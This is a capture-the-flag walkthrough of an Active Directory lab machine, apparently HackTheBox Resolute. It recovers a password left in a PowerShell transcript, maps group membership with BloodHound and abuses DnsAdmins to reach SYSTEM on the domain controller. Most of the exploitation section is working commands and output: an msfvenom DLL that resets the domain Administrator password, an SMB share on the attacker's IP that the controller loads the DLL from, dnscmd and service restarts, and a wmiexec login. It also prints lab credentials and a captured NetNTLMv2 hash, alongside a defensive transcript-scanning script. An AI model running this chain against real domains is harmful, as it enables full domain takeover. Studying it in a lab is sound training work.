This is a PowerShell transcript: transcription logging (Start-Transcript, or the "Turn on PowerShell Transcription" policy) records every command typed in a session to the configured output directory, here C:\PSTranscripts. The header shows whose session it was and how: MEGABANK\ryan, hosted by wsmprovhost.exe, i.e. a WinRM session. ryan tried to map \\fs01\backups with his password on the command line, in the wrong argument order (net use expects the password before /user:, not after a bare username), which is why cmd rejected it with "The syntax of this command is". The command failed, but the transcript kept the password anyway: MEGABANK\ryan:Serv3r4Admin4cc123!. Transcript directories are a recurring source of credentials and should be locked down with ACLs and shipped off-host; next, analyse ryan in BloodHound.
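Transcripts are long and the interesting line is easy to miss, so here is an added example, not from the original write-up, that scans transcript text for commands carrying credentials: net use in both the documented order and the swapped order ryan used, ConvertTo-SecureString -AsPlainText, and cmdkey /pass:. The sample transcript is a constructed excerpt; only the first command is from the page, the other three are hypothetical.

```python
"""Scan PowerShell transcript text for commands that embed credentials.
Added example, not part of the original write-up. TRANSCRIPT_SAMPLE is a
constructed excerpt: the net use line is the one the page found, the other
three commands are hypothetical forms of the same mistake."""
import re

TRANSCRIPT_SAMPLE = r'''
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
PS>net use Y: \\fs02\share Summer2019! /user:MEGABANK\svc_backup
PS>$p = ConvertTo-SecureString 'Autumn2019!' -AsPlainText -Force
PS>cmdkey /add:fs03 /user:MEGABANK\alice /pass:Winter2019!
'''

# Documented form: net use <drive> <unc> <password> /user:<user>
NET_USE_RE = re.compile(
    r"net\s+use\s+\S+\s+(?P<share>\\\\\S+)\s+(?P<password>\S+)\s+/user:(?P<user>\S+)", re.I)
# The form in the page's transcript: <unc> <user> <password>, no /user: switch.
NET_USE_SWAPPED_RE = re.compile(
    r"net\s+use\s+\S+\s+(?P<share>\\\\\S+)\s+(?P<user>[\w.\\-]+)\s+(?P<password>[^\s\"]+)(?!\s*/user:)", re.I)
SECURESTRING_RE = re.compile(
    r"ConvertTo-SecureString\s+(?:-String\s+)?['\"](?P<password>[^'\"]+)['\"][^\n]*-AsPlainText", re.I)
CMDKEY_RE = re.compile(r"cmdkey\s+.*?/user:(?P<user>\S+)\s+/pass:(?P<password>\S+)", re.I)


def find_credentials(transcript):
    """Return deduplicated (kind, user, password, context) tuples found in the transcript."""
    hits = []
    for line in transcript.splitlines():
        if m := NET_USE_RE.search(line):
            hits.append(("net use", m["user"], m["password"], m["share"]))
            continue
        if m := NET_USE_SWAPPED_RE.search(line):
            hits.append(("net use (malformed)", m["user"], m["password"], m["share"]))
        if m := SECURESTRING_RE.search(line):
            hits.append(("ConvertTo-SecureString", None, m["password"], line.strip()))
        if m := CMDKEY_RE.search(line):
            hits.append(("cmdkey", m["user"], m["password"], line.strip()))
    seen, out = set(), []
    for h in hits:
        if h not in seen:
            seen.add(h)
            out.append(h)
    return out


def transcript_sessions(transcript):
    """(user, host application) per transcript header; wsmprovhost.exe means a WinRM session."""
    users = re.findall(r"^Username:\s*(\S+)", transcript, re.M)
    hosts = re.findall(r"^Host Application:\s*(.+)$", transcript, re.M)
    return list(zip(users, hosts))


if __name__ == "__main__":
    for user, host in transcript_sessions(TRANSCRIPT_SAMPLE):
        print(f"session: {user} via {host}")
    for kind, user, password, context in find_credentials(TRANSCRIPT_SAMPLE):
        print(f"{kind:24s} user={user} password={password}   ({context})")
```

Point find_credentials() at every file under a transcript directory (or at Start-Transcript output found in user profiles); the swapped-order pattern is deliberately permissive, so review its hits by hand.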
BloodHound analysis of ryan:
MEGABANK\ryan is a member of CONTRACTORS@MEGABANK.LOCAL.
CONTRACTORS@MEGABANK.LOCAL has the CanPSRemote edge to the DC, so ryan can also log in over WinRM.
Under ryan's Unrolled Group Membership, CONTRACTORS@MEGABANK.LOCAL is itself a member of DNSADMINS@MEGABANK.LOCAL, so ryan is effectively a DnsAdmin.
Plan: log in to the DC as ryan over WinRM; since ryan is a DnsAdmin through Contractors, try the DnsAdmins DLL-loading abuse to get SYSTEM on the DC and with it full control of the domain.

Abusing DnsAdmins to get SYSTEM

Evil-WinRM login: proxychains evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!
Check BloodHound's result first: is ryan really in DnsAdmins? whoami /groups shows the token:
Output:
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
ryan's token does carry MEGABANK\DnsAdmins (and BUILTIN\Remote Management Users, which is what grants the WinRM access).
DnsAdmins in brief: members can read and manage the DNS server's configuration (the default ACL grants Read, Write, Create all child objects, Delete child objects and Special permissions). The group cannot start or stop the DNS service by default, but administrators fairly often grant that right. When they do, a member can set the ServerLevelPluginDll registry value through dnscmd; the DNS service (dns.exe, running as SYSTEM) loads that DLL at its next start, so any DLL the member can point it at runs as SYSTEM on the DC.
References on the DnsAdmins escalation:
https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2
http://t.zoukankan.com/backlion-p-9888851.html
Exploitation:
1. Generate the DLL with msfvenom. The payload resets the domain Administrator password to Hack@123!, which we then use to log in.
Command: msfvenom -p windows/x64/exec cmd='net user administrator Hack@123! /domain' -f dll > 666.dll
This writes 666.dll to the current directory.
Output:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 308 bytes
Final size of dll file: 8704 bytes
2. Serve the DLL over SMB with impacket's smbserver.py so the DC can load it from a UNC path. The share is named "share" and maps to /home/kali/Desktop/temp/.
Command: python3 smbserver.py share /home/kali/Desktop/temp/
Output:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,49744)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:e49c4be2db354722fa97566e8b70dc25:01010000000000008072dd93642ad9010b22281d41e3938400000000010010006d00710042004f00750066004d005400030010006d00710042004f00750066004d0054000200100069004b0061006200490055004c006f000400100069004b0061006200490055004c006f00070008008072dd93642ad901060004000200000008003000300000000000000000000000004000007c98156cf5cb7544a109737d652c69e8d012b63ce8ab077535416d60b20781190a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0039000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:SHARE)
[*] Closing down connection (10.10.10.169,49744)
[*] Remaining connections []
The RESOLUTE$ lines above only appear after the dnscmd command below has been run and the DNS service restarted: the DC's machine account connects to our share to fetch the DLL (and hands us its NetNTLMv2 response in the process). The "Disconnecting Share(2:SHARE)" line confirms it came in through the share named "share".
3. Point the DNS server at the DLL over the UNC path (share name "share", as created above):
Command (in the Evil-WinRM session): *Evil-WinRM* PS C:\Users\ryan\Documents> cmd /c dnscmd localhost /config /serverlevelplugindll \\10.10.16.9\share\666.dll
Output:
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
What this does: dnscmd writes the UNC path into HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll; nothing runs until the service restarts.
4. Restart the DNS service so dns.exe loads the DLL as SYSTEM:
Command: sc.exe stop dns
Command: sc.exe start dns
Note: DnsAdmins cannot restart the DNS service by default; on this box the domain admin granted the group that right. Two practical caveats: resetting the Administrator password is loud and destructive, and on a real engagement a payload that adds a controlled account to a group (or a reverse shell) is preferable; and the plugin value should be cleared afterwards (delete the ServerLevelPluginDll value and restart DNS), because a stale path to a share that no longer exists leaves the DNS service failing to start.

Log in to the DC as Administrator with wmiexec

administrator:Hack@123!
Command: python3 wmiexec.py administrator@10.10.10.169
Output:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
Strictly speaking the wmiexec shell runs as the authenticating user (Administrator, a Domain Admin), not as NT AUTHORITY\SYSTEM; the SYSTEM-level execution was the DLL inside dns.exe that reset the password. Either way the domain is fully compromised at this point.

Summary

Nmap identified the host as a domain controller. windapsearch enumerated the domain users over an anonymous LDAP bind, and the account descriptions (also readable through an rpcclient null session) revealed that marko's password had been written into his description: marko:Welcome123!. crackmapexec showed the credential no longer worked for marko, so after confirming there was no lockout policy the same password was sprayed across the enumerated users, which succeeded for melanie. bloodhound.py collected the domain; melanie has CanPSRemote to the DC, so evil-winrm gave a session there. Post-login enumeration found a PowerShell transcript in the hidden C:\PSTranscripts directory containing MEGABANK\ryan:Serv3r4Admin4cc123!. BloodHound showed that ryan also has CanPSRemote and is a member of CONTRACTORS@MEGABANK.LOCAL, which is in turn a member of DNSADMINS@MEGABANK.LOCAL. Abusing DnsAdmins (ServerLevelPluginDll plus a DNS service restart) ran a DLL as SYSTEM that reset the Administrator password, and wmiexec then gave an Administrator shell on the DC.

http://www.ppmy.cn/news/12874.html
